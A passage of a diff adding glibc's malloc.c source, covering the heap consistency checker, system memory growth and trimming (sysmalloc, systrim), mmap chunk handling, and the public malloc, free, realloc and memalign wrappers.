+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service the request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
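+              /* Example with hypothetical values SIZE_SZ == 4 and
+                 MALLOC_ALIGNMENT == 16: chunk2mem (mm) == mm + 8 is
+                 misaligned by 8, so correction == 8; the chunk then starts
+                 at mm + 8 and prev_size == 8 records the offset back to
+                 the start of the mapping for the later munmap.  */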
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          arena_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          arena_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
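+          /* The zero-sized header written just above stays marked
+             PREV_INUSE and forms the outer half of the fencepost guarding
+             the end of the old heap; the 2 * SIZE_SZ chunk set up below
+             (or folded into old_top in the else branch) is the inner
+             half.  */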
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space.  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
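+  /* For instance (hypothetical figures, 64-bit): with top_size = 200 KiB,
+     pad = 128 KiB and 4 KiB pages, top_area - pad is just under 72 KiB and
+     extra rounds down to 68 KiB, which is what would be handed back.  */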
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* see if the dynamic brk/mmap threshold needs adjusting */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
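+      /* Raising mmap_threshold (and trim_threshold with it) means later
+         requests of this size are served from the heap instead of by a
+         fresh mmap, avoiding repeated mmap/munmap round trips.  */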
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+      || __builtin_expect (misaligned_chunk (oldp), 0))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
